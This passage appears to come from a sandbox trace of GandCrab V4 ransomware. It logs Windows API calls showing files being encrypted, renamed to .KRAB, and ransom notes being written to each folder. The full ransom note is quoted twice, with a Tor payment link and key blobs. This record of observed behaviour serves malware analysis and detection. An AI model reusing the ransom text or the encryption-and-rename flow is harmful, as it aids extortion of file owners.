phKey=0x338e730 | out: phKey=0x338e730*=0xfbd820) returned 1 [0061.292] CryptGetKeyParam (in: hKey=0xfbd820, dwParam=0x8, pbData=0x338e724, pdwDataLen=0x338e728, dwFlags=0x0 | out: pbData=0x338e724*=0x800, pdwDataLen=0x338e728*=0x4) returned 1 [0061.292] CryptEncrypt (in: hKey=0xfbd820, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f30100*, pdwDataLen=0x338e75c*=0xc8, dwBufLen=0x100 | out: pbData=0x2f30100*, pdwDataLen=0x338e75c*=0x100) returned 1 [0061.292] GetLastError () returned 0x0 [0061.292] CryptDestroyKey (hKey=0xfbd820) returned 1 [0061.292] CryptReleaseContext (hProv=0xfbca08, dwFlags=0x0) returned 1 [0061.292] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Office\\Recent\\Templates.LNK" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\office\\recent\\templates.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x448 [0061.293] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x35e0000 [0061.293] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x3870000 [0061.295] ReadFile (in: hFile=0x448, lpBuffer=0x35e0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338e7fc, lpOverlapped=0x0 | out: lpBuffer=0x35e0000*, lpNumberOfBytesRead=0x338e7fc*=0x4a7, lpOverlapped=0x0) returned 1 [0061.358] SetFilePointerEx (in: hFile=0x448, liDistanceToMove=0xfffffb59, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0061.359] WriteFile (in: hFile=0x448, lpBuffer=0x3870000*, nNumberOfBytesToWrite=0x4a7, lpNumberOfBytesWritten=0x338e7f8, lpOverlapped=0x0 | out: lpBuffer=0x3870000*, lpNumberOfBytesWritten=0x338e7f8*=0x4a7, lpOverlapped=0x0) returned 1 [0061.359] WriteFile (in: hFile=0x448, lpBuffer=0x2f30000*, nNumberOfBytesToWrite=0x208, lpNumberOfBytesWritten=0x338e7f8, lpOverlapped=0x0 | out: lpBuffer=0x2f30000*, lpNumberOfBytesWritten=0x338e7f8*=0x208, lpOverlapped=0x0) returned 1 [0061.359] VirtualFree (lpAddress=0x35e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0061.362] VirtualFree (lpAddress=0x3870000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0061.363] CloseHandle (hObject=0x448) returned 1 [0061.363] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0061.364] MoveFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Office\\Recent\\Templates.LNK" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\office\\recent\\templates.lnk"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Office\\Recent\\Templates.LNK.KRAB" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\office\\recent\\templates.lnk.krab")) returned 1 [0061.365] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0061.365] FindNextFileW (in: hFindFile=0xfbd7a0, lpFindFileData=0x338e850 | out: lpFindFileData=0x338e850) returned 0 [0061.365] FindClose (in: hFindFile=0xfbd7a0 | out: hFindFile=0xfbd7a0) returned 1 [0061.365] CloseHandle (hObject=0x440) returned 1 [0061.365] FindNextFileW (in: hFindFile=0xfbd520, lpFindFileData=0x338ead0 | out: lpFindFileData=0x338ead0) returned 0 [0061.365] FindClose (in: hFindFile=0xfbd520 | out: hFindFile=0xfbd520) returned 1 [0061.366] CloseHandle (hObject=0x3ac) returned 1 [0061.366] FindNextFileW (in: hFindFile=0xfbd560, lpFindFileData=0x338ed50 | out: lpFindFileData=0x338ed50) returned 1 [0061.366] lstrcmpW (lpString1="OneNote", lpString2=".") returned 1 [0061.366] lstrcmpW (lpString1="OneNote", lpString2="..") returned 1 [0061.366] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\", lpString2="OneNote" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\OneNote") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\OneNote" [0061.366] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\OneNote", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\OneNote\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\OneNote\\" [0061.366] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x2ea0000 [0061.366] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2ea0000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0061.366] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2ea0000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0061.366] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2ea0000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0061.366] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2ea0000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0061.366] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0061.367] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x2ea0000 [0061.367] wsprintfW (in: param_1=0x2ea0200, param_2="%s\\KRAB-DECRYPT.txt" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\OneNote\\\\KRAB-DECRYPT.txt") returned 73 [0061.367] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\OneNote\\\\KRAB-DECRYPT.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\onenote\\krab-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3ac [0061.368] lstrlenW (lpString="---= GANDCRAB V4 =--- \r\r\n\r\r\nAttention! \r\r\nAll your files, documents, photos, databases and other important files are encrypted and have the extension: .KRAB \r\r\nThe only method of recovering files is to purchase an unique private key. Only we can give you this key and only we can recover your files.\r\n\r\r\nThe server with your key is in a closed network TOR. You can get there by the following ways:\r\n\r\n----------------------------------------------------------------------------------------\r\r\n| 0. Download Tor browser - https://www.torproject.org/ \r\r\n| 1. Install Tor browser \r\n| 2. Open Tor Browser \r\n| 3. Open link in TOR browser: http://gandcrabmfe6mnef.onion/dce1bb8bd2ca4def \r\n| 4. Follow the instructions on this page \r\r\n---------------------------------------------------------------------------------------- \r\n \r\r\nOn our page you will see instructions on payment and get the opportunity to decrypt 1 file for free. \r\r\n\r\nATTENTION!\r\r\nIN ORDER TO PREVENT DATA DAMAGE:\r\n\r\n* DO NOT MODIFY ENCRYPTED FILES\r\n* DO NOT CHANGE DATA BELOW\r\n\r\n---BEGIN GANDCRAB KEY---\r\n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\r\n---END GANDCRAB KEY---\r\n\r\n---BEGIN PC DATA---\r\nwfKD6iudumBkmpL8IRr4U4WxPFasOVPtwzxuOrz15VYnvLCWAh5YYedd8JZ0TohRkHY+7lVWgLeoTG2H6B5UBLbzu9M274X6G0GXDCriMpJ288/FKv/amF6obpAeLpej5fxw2X3xAZKuipuhf0T/Aq8AmLZ0OOqX4bnabVckN3QybYaW5sCbYapYDKSRxsQpKY4m29eAXVK1ZEZVsQONuUHcKCJJ2P+MK0OxMKkPxYoALGmTApxSmtAoT3Z6P6Q/GfqS1pdzxDbVjd1AG3hpl55nRN0JCAMxfQ7GDJ0r+X0/Si/FGQ/ukeotJdiuqcCnrbrH57Rit7F/kRzBs+Lx/2c2Q+t0GtNYPlrXBiXt/hGHEd0b9SdH4o+4Laa5Y59yPYyu2Qiiy5RtTRYqBlPKJPYJzJFtwNYoDRPKnK0+De5cAL2fimEyg6RrIA32xA9Kxw7zZibpCBFJ3vTLMeag1wIZNXQARgyKKDnc1lDgdH8NmV7f2yy3QRtn8rJ3lpuw5nIKVY/pfTfifFIcKcAhPzVN238JQy/C1qZGEv3tLUi+BdhMPpGxHsMOI7+QRdQP94kvV//uurM=\r\n---END PC DATA---") returned 4023 [0061.368] WriteFile (in: hFile=0x3ac, lpBuffer=0x2f20000*, nNumberOfBytesToWrite=0x1f6e, lpNumberOfBytesWritten=0x338eaa0, lpOverlapped=0x0 | out: lpBuffer=0x2f20000*, lpNumberOfBytesWritten=0x338eaa0*=0x1f6e, lpOverlapped=0x0) returned 1 [0061.369] CloseHandle (hObject=0x3ac) returned 1 [0061.369] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0061.369] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x2ea0000 [0061.369] GetSystemTime (in: lpSystemTime=0x2ea0400 | out: lpSystemTime=0x2ea0400*(wYear=0x7e2, wMonth=0x7, wDayOfWeek=0x4, wDay=0x5, wHour=0xd, wMinute=0x2d, wSecond=0x8, wMilliseconds=0x23b)) [0061.372] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0061.372] GetWindowsDirectoryW (in: lpBuffer=0x2f30000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0061.372] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2f30200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2f30600, lpMaximumComponentLength=0x2f30608, lpFileSystemFlags=0x2f30604, lpFileSystemNameBuffer=0x2f30400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2f30600*=0xd2ca4def, lpMaximumComponentLength=0x2f30608*=0xff, lpFileSystemFlags=0x2f30604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0061.373] wsprintfW (in: param_1=0x2ea0000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\OneNote\\d2ca4a08d2ca4dee3d.lock") returned 79 [0061.373] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\OneNote\\d2ca4a08d2ca4dee3d.lock" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\onenote\\d2ca4a08d2ca4dee3d.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x3ac [0061.373] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0061.374] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0061.374] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\OneNote\\") returned 56 [0061.374] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\OneNote\\", lpString2="*" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\OneNote\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\OneNote\\*" [0061.374] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\OneNote\\*", lpFindFileData=0x338ead0 | out: lpFindFileData=0x338ead0) returned 0xfbd8a0 [0061.374] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0061.374] FindNextFileW (in: hFindFile=0xfbd8a0, lpFindFileData=0x338ead0 | out: lpFindFileData=0x338ead0) returned 1 [0061.374] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0061.374] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0061.374] FindNextFileW (in: hFindFile=0xfbd8a0, lpFindFileData=0x338ead0 | out: lpFindFileData=0x338ead0) returned 1 [0061.374] lstrcmpW (lpString1="16.0", lpString2=".") returned 1 [0061.374] lstrcmpW (lpString1="16.0", lpString2="..") returned 1 [0061.375] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\OneNote\\", lpString2="16.0" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\OneNote\\16.0") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\OneNote\\16.0" [0061.375] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\OneNote\\16.0", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\OneNote\\16.0\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\OneNote\\16.0\\" [0061.375] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x2ea0000 [0061.375] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2ea0000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0061.375] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2ea0000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0061.375] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2ea0000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0061.375] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2ea0000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0061.375] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0061.375] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x2ea0000 [0061.376] wsprintfW (in: param_1=0x2ea0200, param_2="%s\\KRAB-DECRYPT.txt" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\OneNote\\16.0\\\\KRAB-DECRYPT.txt") returned 78 [0061.376] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\OneNote\\16.0\\\\KRAB-DECRYPT.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\onenote\\16.0\\krab-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x440 [0061.376] lstrlenW (lpString="---= GANDCRAB V4 =--- \r\r\n\r\r\nAttention! \r\r\nAll your files, documents, photos, databases and other important files are encrypted and have the extension: .KRAB \r\r\nThe only method of recovering files is to purchase an unique private key. Only we can give you this key and only we can recover your files.\r\n\r\r\nThe server with your key is in a closed network TOR. You can get there by the following ways:\r\n\r\n----------------------------------------------------------------------------------------\r\r\n| 0. Download Tor browser - https://www.torproject.org/ \r\r\n| 1. Install Tor browser \r\n| 2. Open Tor Browser \r\n| 3. Open link in TOR browser: http://gandcrabmfe6mnef.onion/dce1bb8bd2ca4def \r\n| 4. Follow the instructions on this page \r\r\n---------------------------------------------------------------------------------------- \r\n \r\r\nOn our page you will see instructions on payment and get the opportunity to decrypt 1 file for free. \r\r\n\r\nATTENTION!\r\r\nIN ORDER TO PREVENT DATA DAMAGE:\r\n\r\n* DO NOT MODIFY ENCRYPTED FILES\r\n* DO NOT CHANGE DATA BELOW\r\n\r\n---BEGIN GANDCRAB KEY---\r\n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\r\n---END GANDCRAB KEY---\r\n\r\n---BEGIN PC DATA---\r\nwfKD6iudumBkmpL8IRr4U4WxPFasOVPtwzxuOrz15VYnvLCWAh5YYedd8JZ0TohRkHY+7lVWgLeoTG2H6B5UBLbzu9M274X6G0GXDCriMpJ288/FKv/amF6obpAeLpej5fxw2X3xAZKuipuhf0T/Aq8AmLZ0OOqX4bnabVckN3QybYaW5sCbYapYDKSRxsQpKY4m29eAXVK1ZEZVsQONuUHcKCJJ2P+MK0OxMKkPxYoALGmTApxSmtAoT3Z6P6Q/GfqS1pdzxDbVjd1AG3hpl55nRN0JCAMxfQ7GDJ0r+X0/Si/FGQ/ukeotJdiuqcCnrbrH57Rit7F/kRzBs+Lx/2c2Q+t0GtNYPlrXBiXt/hGHEd0b9SdH4o+4Laa5Y59yPYyu2Qiiy5RtTRYqBlPKJPYJzJFtwNYoDRPKnK0+De5cAL2fimEyg6RrIA32xA9Kxw7zZibpCBFJ3vTLMeag1wIZNXQARgyKKDnc1lDgdH8NmV7f2yy3QRtn8rJ3lpuw5nIKVY/pfTfifFIcKcAhPzVN238JQy/C1qZGEv3tLUi+BdhMPpGxHsMOI7+QRdQP94kvV//uurM=\r\n---END PC DATA---") returned 4023 [0061.376] WriteFile (in: hFile=0x440, lpBuffer=0x2f20000*, nNumberOfBytesToWrite=0x1f6e, lpNumberOfBytesWritten=0x338e820, lpOverlapped=0x0 | out: lpBuffer=0x2f20000*, lpNumberOfBytesWritten=0x338e820*=0x1f6e, lpOverlapped=0x0) returned 1 [0061.377] CloseHandle (hObject=0x440) returned 1 [0061.377] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0061.378] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x2ea0000 [0061.378] GetSystemTime (in: lpSystemTime=0x2ea0400 | out: lpSystemTime=0x2ea0400*(wYear=0x7e2, wMonth=0x7, wDayOfWeek=0x4, wDay=0x5, wHour=0xd, wMinute=0x2d, wSecond=0x8, wMilliseconds=0x23b)) [0061.378] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0061.378] GetWindowsDirectoryW (in: lpBuffer=0x2f30000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0061.378] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2f30200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2f30600, lpMaximumComponentLength=0x2f30608, lpFileSystemFlags=0x2f30604, lpFileSystemNameBuffer=0x2f30400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2f30600*=0xd2ca4def, lpMaximumComponentLength=0x2f30608*=0xff, lpFileSystemFlags=0x2f30604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0061.378] wsprintfW (in: param_1=0x2ea0000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\OneNote\\16.0\\d2ca4a08d2ca4dee3d.lock") returned 84 [0061.378] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\OneNote\\16.0\\d2ca4a08d2ca4dee3d.lock" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\onenote\\16.0\\d2ca4a08d2ca4dee3d.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x440 [0061.380] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0061.381] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0061.381] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\OneNote\\16.0\\") returned 61 [0061.381] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\OneNote\\16.0\\", lpString2="*" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\OneNote\\16.0\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\OneNote\\16.0\\*" [0061.381] FindFirstFileW (in: 